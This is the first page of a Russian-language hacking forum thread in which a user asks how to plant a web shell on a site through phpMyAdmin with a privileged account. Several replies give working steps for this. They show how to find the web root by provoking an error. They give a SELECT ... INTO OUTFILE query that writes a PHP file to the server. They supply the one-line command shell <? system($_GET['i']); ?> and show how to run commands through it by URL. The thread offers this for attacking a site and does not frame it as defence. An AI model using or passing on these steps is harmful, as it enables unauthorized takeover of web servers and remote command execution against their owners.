Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   phpmyadmin (https://forum.antichat.xyz/showthread.php?t=106999)

DIMON4G 19.02.2009 17:31
phpmyadmin
 
как там ваще можно шелку залить, если иметь аккаунт с полными привелегиями... ;) помощи нуждаюсь ачатовцы :eek:

SVAROG 19.02.2009 17:34
_https://forum.xakepok.org/thread115.html

[JavaScript] 19.02.2009 17:48
DIMON4G, если у вас времени нет, либо просто не хотите читать - объясню вкратце. Для начала необходимо знать полный путь к корню сервера. Его можно вызвать с помощью PHP-Ошибки (для этого надо иметь доступ к файлам). Если у вас его нету - можно сделать иначе - сменить на mysql пользователе пароль - в этом случае скрипт покажет ошибку, потому что не сможет подключиться к базе данных с заданым ему логином либо паролем. После этого пароль надо поставить назад. Потом выполнить запрос:
Код:
SELECT '<?php shellcode ?>' INTO OUTFILE '/var/www/site/shell.php'
Где /var/www/site - полный путь к корню, а shell.php - сам файл. Вроде ясно объяснил...

DIMON4G 19.02.2009 17:59
SVAROG лажа со sql запросом какаято :mad:

Код:
SQL-запрос:

CREATE TABLE 'hacker'(
'shell'TEXT
)


Ответ MySQL: 
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''hacker' ('shell' TEXT)' at line 1
[JavaScript]

Код:
<?php shellcode ?>
туда нада путь на сайте указывать? http://sait/ru/shell.txt или сам пхп код? :)

SVAROG 19.02.2009 18:14
в shell.php пиши <? system($_GET['i']); ?>

DIMON4G 19.02.2009 18:23
Цитата:
Сообщение от SVAROG
в shell.txt пиши <? system($_GET['i']); ?>
написал, там в этом файле появилась ссылка http://sait.ru/shell.txt и всё :(

SVAROG 19.02.2009 18:39
пля какой нахер txt (совсем заработался сегодня моск не варит) php
потом будешь выполнять команды типа http://sait.ru/shell.php?i=uname например
если винда там стоит то ищи мануал по командной строке винды если линукс то по линуксу маны кури )

DIMON4G 19.02.2009 19:04
Цитата:
Сообщение от SVAROG
пля какой нахер txt (совсем заработался сегодня моск не варит) php
потом будешь выполнять команды типа http://sait.ru/shell.php?i=uname например
если винда там стоит то ищи мануал по командной строке винды если линукс то по линуксу маны кури )
я говорю на самом сайте где я хочу шел залить пояляется надпись (ссылка), пхп код не загружается, напиши в аську, ппц мы тут тупить бум, просто я объяснить толком не могу я те! :p

[JavaScript] 19.02.2009 19:23
DIMON4G, стукни мне в аську 400442244

DIMON4G 19.02.2009 20:09
[JavaScript] спс, настоящий мужиГ ;)


Время: 19:55
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице